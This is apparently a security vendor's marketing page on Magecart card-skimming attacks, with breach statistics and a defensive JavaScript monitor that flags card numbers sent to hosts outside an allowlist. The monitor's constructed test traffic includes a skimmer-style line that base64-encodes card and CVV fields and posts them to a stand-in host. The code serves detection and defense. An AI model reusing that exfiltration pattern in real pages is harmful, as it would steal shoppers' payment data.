Digital Skimming and Magecart

Why Every E-commerce Website is Vulnerable to a Magecart Attack


Magecart Attacks Are On the Rise

Millions of users and hundreds of thousands of websites have already been compromised by Magecart digital skimming attacks. Between May 2019 and July 2019 alone, 960+ e-commerce stores, 17,000 domains, 200+ online bookstores, and well-known brands like Forbes, Garmin and the American Cancer Society were breached.

These cybercriminals are on the hunt for users’ payment card data so they can sell it to other cybercriminals on the dark web for a profit. Magecart attacks are growing more sophisticated and relentless. Our research has uncovered multiple Magecart groups attacking the same site simultaneously. These cybercriminals don’t discriminate between company size, influence, industry or wealth, which means any company with an e-commerce shop as part of its website is vulnerable.

Client-side is the New Blind Spot

Unlike other cybercriminals, Magecart groups skim payment card data directly on the client side, in the user's browser, where traditional security solutions aren't looking. With the user experience (UX) now a critical competitive differentiator, core logic in modern web applications has shifted from server-side processing to client-side JavaScript libraries to enable rich functionality and to optimize performance. This change has increased the attack surface and created significant security and privacy risk.

Developers once had full accountability for website source code. Today roughly 70% of the client-side code on most websites consists of third-party scripts, and even first-party scripts developed in-house make extensive use of open-source libraries. There are more opportunities than ever for attackers to inject malicious code into the client side to steal, tamper with and hijack user data and payment card information.

Such data breaches can cause significant brand damage, customer churn and a drop in online revenue for an e-commerce business. Customers are much less likely to return to a website that leaked their credit card numbers and may abandon that brand forever. The business can also be exposed to regulatory penalties and financial liabilities. British Airways was hit with a proposed $229M GDPR fine over a Magecart attack and may be exposed to millions more in liability claims from pending lawsuits.

Regardless of what method Magecart cybercriminals use, a breach can go undetected for weeks, even months, resulting in millions of users’ data getting exposed.

(Figure: Magecart timeline)

Traditional Security Solutions Can’t Protect Against Magecart Attacks

Magecart attacks go undetected because threats have evolved faster than corporate application security measures. Traditional security solutions aren’t designed to track and monitor client-side code at run time, but rather to prevent attacks to the back-end infrastructure. For example:

  • Web Application Firewalls (WAFs) can only defend against inbound threats to first-party web infrastructure.
  • Content Security Policies (CSPs) can restrict which origins scripts may be loaded from, but say nothing about the code those origins actually serve: a trusted CDN or tag vendor that is itself compromised still passes the policy. Subresource Integrity can pin a script to a hash, but only for scripts whose content never changes, which rules out most third-party tags.
  • Static scanners do not catch vulnerabilities in real time, and code obfuscation techniques can mask attacks from scanners.

Additionally, because website decision makers don’t fully understand the risks from client-side script compromises, they are not making client-side application security a priority. A recent survey conducted by Osterman Research found that 90% of respondents believe that there is only little to moderate risk from these scripts.

(Figure: first-party vs. third-party script count and length on Magecart-affected sites)

How Companies Can Protect Themselves

Companies can no longer rely on third parties or partners for protection. Instead, they need to:

Educate: Website owners and security professionals must understand that the client-side of a web application needs protection due to the risks associated with third-party scripts and libraries that may change without your knowledge.

Strategize: Companies need to create a robust and sophisticated client-side security strategy that enables a great user experience without sacrificing the security and privacy of user data.

Implement: Companies need to implement new tools and measures focused on client-side security so they can gain visibility into all script activities and get alerts on suspicious changes. They will then be able to prevent unwanted scripts from accessing users' sensitive data and enforce strict data access policies.
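The visibility and alerting that the "Implement" step calls for, and the gap noted earlier about CSP being unable to vouch for what an allowed origin serves, can be shown together in one small piece of browser JavaScript. The block below is an added example, not code from the original page and not PerimeterX's product. It assumes a constructed host allowlist (api.payments.example), constructed sample traffic, and the public Luhn-valid test card number 4111111111111111. From one allowlist it derives a Content Security Policy (the preventive control), then wraps fetch and navigator.sendBeacon so that any outbound request carrying a Luhn-valid card number to a host outside the allowlist raises an alert (the detective control that CSP alone cannot give you, because the skimmer can be served by an allowed origin). It also peels the URL-encoding and base64 layers skimmers typically wrap stolen fields in, which a naive string match would miss.

```javascript
// Added example, not PerimeterX's product code: a small client-side monitor that
// derives a CSP from one host allowlist and wraps the browser's outbound network
// primitives so any request carrying a Luhn-valid card number to a host outside that
// allowlist raises an alert. All hosts, card numbers and traffic below are constructed.

// Candidate PAN: 13-19 digits, optionally separated by spaces or dashes.
const CARD_RE = /\b(?:\d[ -]?){12,18}\d\b/g;

function luhnValid(digits) {
  let sum = 0;
  for (let i = digits.length - 1, dbl = false; i >= 0; i--, dbl = !dbl) {
    let d = digits.charCodeAt(i) - 48;
    if (dbl && (d *= 2) > 9) d -= 9;
    sum += d;
  }
  return sum % 10 === 0;
}

// Skimmers routinely URL-encode and/or base64-encode what they steal; peel both layers.
const b64decode = typeof atob === 'function' ? atob : (s) => Buffer.from(s, 'base64').toString('latin1');
const b64encode = typeof btoa === 'function' ? btoa : (s) => Buffer.from(s, 'latin1').toString('base64');
function decodeLayers(text) {
  const layers = [text];
  try { const u = decodeURIComponent(text); if (u !== text) layers.push(u); } catch (_) {}
  for (const layer of [...layers]) {
    for (const chunk of layer.match(/[A-Za-z0-9+/]{16,}={0,2}/g) || []) {
      try {
        const d = b64decode(chunk);
        if (/^[\x20-\x7e]+$/.test(d)) layers.push(d); // keep only printable decodes
      } catch (_) {}
    }
  }
  return layers;
}

// Distinct Luhn-valid card numbers found in any decoded layer of `text`.
function findPans(text) {
  const pans = new Set();
  for (const layer of decodeLayers(text)) {
    for (const m of layer.match(CARD_RE) || []) {
      const digits = m.replace(/[ -]/g, '');
      if (digits.length >= 13 && digits.length <= 19 && luhnValid(digits)) pans.add(digits);
    }
  }
  return [...pans];
}

// Classify one outbound request {method, url, body} against the host allowlist.
function classifyRequest(req, allowedHosts, baseOrigin) {
  let host = null;
  try { host = new URL(req.url, baseOrigin).hostname; } catch (_) {}
  const pans = findPans(`${req.url} ${req.body || ''}`);
  if (pans.length === 0) return { verdict: 'ok', host, pans };
  return { verdict: allowedHosts.includes(host) ? 'pan-to-allowed-host' : 'suspected-skim', host, pans };
}

// Preventive control from the same allowlist: the CSP stops the browser connecting or
// posting forms anywhere else; the runtime hooks below verify that it actually holds.
function cspFromAllowlist(allowedHosts) {
  const srcs = ["'self'", ...allowedHosts.map((h) => `https://${h}`)].join(' ');
  return `default-src 'self'; script-src ${srcs}; connect-src ${srcs}; form-action ${srcs}`;
}

// Wrap fetch and sendBeacon on `win`; `onAlert` receives every suspected skim.
function installHooks(win, allowedHosts, onAlert) {
  const check = (method, url, body) => {
    const r = classifyRequest({ method, url, body }, allowedHosts, win.location.origin);
    if (r.verdict === 'suspected-skim') onAlert({ method, url, ...r });
    return r;
  };
  if (typeof win.fetch === 'function') {
    const origFetch = win.fetch;
    win.fetch = function (input, init = {}) {
      check('fetch', typeof input === 'string' ? input : input.url, init.body);
      return origFetch.call(this, input, init);
    };
  }
  if (win.navigator && typeof win.navigator.sendBeacon === 'function') {
    const origBeacon = win.navigator.sendBeacon.bind(win.navigator);
    win.navigator.sendBeacon = (url, data) => { check('beacon', url, data); return origBeacon(url, data); };
  }
  return check;
}

// Constructed traffic: a legitimate charge, a harmless pixel, and a skimmer beacon that
// base64-encodes the card form fields and posts them to an unrelated host.
const ALLOWED = ['api.payments.example'];
const SAMPLE = [
  { method: 'POST', url: 'https://api.payments.example/charge', body: '{"pan":"4111111111111111","exp":"12/26"}' },
  { method: 'GET', url: 'https://cdn.analytics.example/p.gif?e=pageview' },
  { method: 'POST', url: 'https://stats.example.org/collect', body: 'd=' + encodeURIComponent(b64encode('cc=4111 1111 1111 1111&cvv=123')) },
];
const runSample = () => SAMPLE.map((r) => classifyRequest(r, ALLOWED, 'https://shop.example'));

// Drive the hooks against a fake window so the example runs outside a browser.
function simulateSkimmer() {
  const alerts = [];
  const win = { location: { origin: 'https://shop.example' }, fetch: () => Promise.resolve({ ok: true }),
    navigator: { sendBeacon: () => true } };
  installHooks(win, ALLOWED, (a) => alerts.push(a));
  win.fetch(SAMPLE[0].url, { method: 'POST', body: SAMPLE[0].body }); // legitimate charge: no alert
  win.navigator.sendBeacon(SAMPLE[2].url, SAMPLE[2].body);            // exfiltration: alert
  return alerts;
}
```

In a real deployment the hook installer runs as the first script on the checkout page (so later scripts cannot grab the original fetch before it is wrapped), XMLHttpRequest.prototype.open/send and Image.src are wrapped the same way, and the alert callback reports to an endpoint that is itself on the allowlist. The CSP string is sent as the Content-Security-Policy response header; the monitor exists because an allowed origin can still serve skimming code, which is exactly the case the policy cannot see.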

Attackers will continue to exploit zero-day vulnerabilities and security weak points to compromise e-commerce websites through Magecart-style attacks. Businesses are ultimately responsible for protecting their user data and defending their brand reputation. To learn more about client-side security and how your organization can protect itself from Magecart attacks, read our new white paper: “Magecart Attacks: The Biggest Threat to Online Transactions”.

© PerimeterX, Inc. All rights reserved.